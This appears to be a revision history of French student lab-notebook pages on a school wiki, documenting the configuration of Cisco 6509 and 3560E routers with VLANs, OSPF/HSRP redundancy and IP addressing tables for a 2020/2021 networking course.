Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52542TP sysres IMA2a5 2020/2021 G62020-10-02T16:48:14Z<p>Tvitteco : </p>
<hr />
<div>__TOC__<br />
<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
pastabox.site</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52541TP sysres IMA2a5 2020/2021 G62020-10-02T15:55:20Z<p>Tvitteco : </p>
<hr />
<div>__TOC__<br />
<br />
== configuration 3560E ==<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui éberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs <br />
<br />
pastabox.site</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52540TP sysres IMA2a5 2020/2021 G62020-10-01T10:24:19Z<p>Tvitteco : /* configuration 3560E */</p>
<hr />
<div>== configuration 3560E ==<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui éberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs <br />
<br />
pastabox.site</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52479TP sysres IMA2a5 2020/2021 G62020-09-26T07:31:17Z<p>Tvitteco : /* configuration 3560E */</p>
<hr />
<div>== configuration 3560E ==<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui éberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52466TP sysres IMA2a5 2020/2021 G62020-09-25T09:05:31Z<p>Tvitteco : /* test */</p>
<hr />
<div>== configuration 3560E ==</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52464TP sysres IMA2a5 2020/2021 G62020-09-25T08:55:16Z<p>Tvitteco : </p>
<hr />
<div>== test ==</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52463TP sysres IMA2a5 2020/2021 G62020-09-25T08:52:48Z<p>Tvitteco : Page créée avec « zedrfghj »</p>
<hr />
<div>zedrfghj</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52462TP sysres IMA2a5 2020/20212020-09-25T08:48:23Z<p>Tvitteco : /* Table du vlan2 */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
<br />
=== Table du vlan1 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|10.60.0.1<br />
|-<br />
|3560 E<br />
|10.60.0.2<br />
|-<br />
|mask<br />
|255.255.255.0<br />
|}<br />
<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP !! nom Vm<br />
|-<br />
|6509<br />
|193.48.57.161<br />
|X<br />
|-<br />
|3560 E<br />
|193.48.57.162<br />
|X<br />
|-<br />
|routeur virtuel<br />
|193.48.57.163<br />
|X<br />
|-<br />
|Lionel<br />
|193.48.57.164<br />
|Rafale<br />
|-<br />
|Guillaume<br />
|193.48.57.165<br />
|X<br />
|-<br />
|Samuel<br />
|193.48.57.166<br />
|X<br />
|-<br />
|Thibaut<br />
|193.48.57.167<br />
|Falcon<br />
|-<br />
|Alexandre<br />
|193.48.57.168<br />
|Mirage<br />
|-<br />
|Thomas<br />
|193.48.57.169<br />
|Alpha_jet<br />
|-<br />
|Crispin<br />
|193.48.57.170<br />
|X<br />
|-<br />
|Léna<br />
|193.48.57.171<br />
|X<br />
|-<br />
|Nathan<br />
|193.48.57.172<br />
|X<br />
|-<br />
|ISR<br />
|193.48.57.173<br />
|X<br />
|-<br />
|Mask<br />
|255.255.255.240<br />
|X<br />
|-<br />
|}<br />
<br />
=== Table du vlan130 ===<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|192.168.222.2<br />
|-<br />
|3560 E<br />
|1192.168.222.1<br />
|-<br />
|mask<br />
|255.255.255.248<br />
|}<br />
<br />
=== Table des vlan ===<br />
<br />
{| class="wikitable"<br />
!Nom !! Vlan <br />
|-<br />
|Lionel<br />
|Vlan3<br />
|-<br />
|Guillaume<br />
|Vlan4<br />
|-<br />
|Samuel<br />
|Vlan5<br />
|-<br />
|Thibaut<br />
|Vlan6<br />
|-<br />
|Alexandre<br />
|Vlan7<br />
|-<br />
|Thomas<br />
|Vlan8<br />
|-<br />
|Crispin<br />
|Vlan9<br />
|-<br />
|Léna<br />
|Vlan10<br />
|-<br />
|Nathan<br />
|Vlan11<br />
|-<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52461TP sysres IMA2a5 2020/20212020-09-25T08:44:17Z<p>Tvitteco : /* Table d'adressage IP */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
<br />
=== Table du vlan1 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|10.60.0.1<br />
|-<br />
|3560 E<br />
|10.60.0.2<br />
|-<br />
|mask<br />
|255.255.255.0<br />
|}<br />
<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP !! nom Vm<br />
|-<br />
|6509<br />
|193.48.57.61<br />
|X<br />
|-<br />
|3560 E<br />
|193.48.57.62<br />
|X<br />
|-<br />
|routeur virtuel<br />
|193.48.57.63<br />
|X<br />
|-<br />
|Lionel<br />
|193.48.57.64<br />
|Rafale<br />
|-<br />
|Guillaume<br />
|193.48.57.65<br />
|X<br />
|-<br />
|Samuel<br />
|193.48.57.66<br />
|X<br />
|-<br />
|Thibaut<br />
|193.48.57.67<br />
|Falcon<br />
|-<br />
|Alexandre<br />
|193.48.57.68<br />
|Mirage<br />
|-<br />
|Thomas<br />
|193.48.57.69<br />
|Alpha_jet<br />
|-<br />
|Crispin<br />
|193.48.57.70<br />
|X<br />
|-<br />
|Léna<br />
|193.48.57.71<br />
|X<br />
|-<br />
|Nathan<br />
|193.48.57.72<br />
|X<br />
|-<br />
|ISR<br />
|193.48.57.73<br />
|X<br />
|-<br />
|Mask<br />
|255.255.255.240<br />
|X<br />
|-<br />
|}<br />
<br />
=== Table du vlan130 ===<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|192.168.222.2<br />
|-<br />
|3560 E<br />
|1192.168.222.1<br />
|-<br />
|mask<br />
|255.255.255.248<br />
|}<br />
<br />
=== Table des vlan ===<br />
<br />
{| class="wikitable"<br />
!Nom !! Vlan <br />
|-<br />
|Lionel<br />
|Vlan3<br />
|-<br />
|Guillaume<br />
|Vlan4<br />
|-<br />
|Samuel<br />
|Vlan5<br />
|-<br />
|Thibaut<br />
|Vlan6<br />
|-<br />
|Alexandre<br />
|Vlan7<br />
|-<br />
|Thomas<br />
|Vlan8<br />
|-<br />
|Crispin<br />
|Vlan9<br />
|-<br />
|Léna<br />
|Vlan10<br />
|-<br />
|Nathan<br />
|Vlan11<br />
|-<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52460TP sysres IMA2a5 2020/20212020-09-25T08:39:57Z<p>Tvitteco : /* Table d'adressage IP */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
<br />
=== Table du vlan1 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|10.60.0.1<br />
|-<br />
|3560 E<br />
|10.60.0.2<br />
|-<br />
|mask<br />
|255.255.255.0<br />
|}<br />
<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP !! nom Vm<br />
|-<br />
|6509<br />
|193.48.57.61<br />
|X<br />
|-<br />
|3560 E<br />
|193.48.57.62<br />
|X<br />
|-<br />
|routeur virtuel<br />
|193.48.57.63<br />
|X<br />
|-<br />
|Lionel<br />
|193.48.57.64<br />
|Rafale<br />
|-<br />
|Guillaume<br />
|193.48.57.65<br />
|X<br />
|-<br />
|Samuel<br />
|193.48.57.66<br />
|X<br />
|-<br />
|Thibaut<br />
|193.48.57.67<br />
|Falcon<br />
|-<br />
|Alexandre<br />
|193.48.57.68<br />
|Mirage<br />
|-<br />
|Thomas<br />
|193.48.57.69<br />
|Alpha_jet<br />
|-<br />
|Crispin<br />
|193.48.57.70<br />
|X<br />
|-<br />
|Léna<br />
|193.48.57.71<br />
|X<br />
|-<br />
|Nathan<br />
|193.48.57.72<br />
|X<br />
|-<br />
|ISR<br />
|193.48.57.73<br />
|X<br />
|-<br />
|Mask<br />
|255.255.255.240<br />
|X<br />
|-<br />
|}<br />
<br />
=== Table du vlan130 ===<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|192.168.222.2<br />
|-<br />
|3560 E<br />
|1192.168.222.1<br />
|-<br />
|mask<br />
|255.255.255.248<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
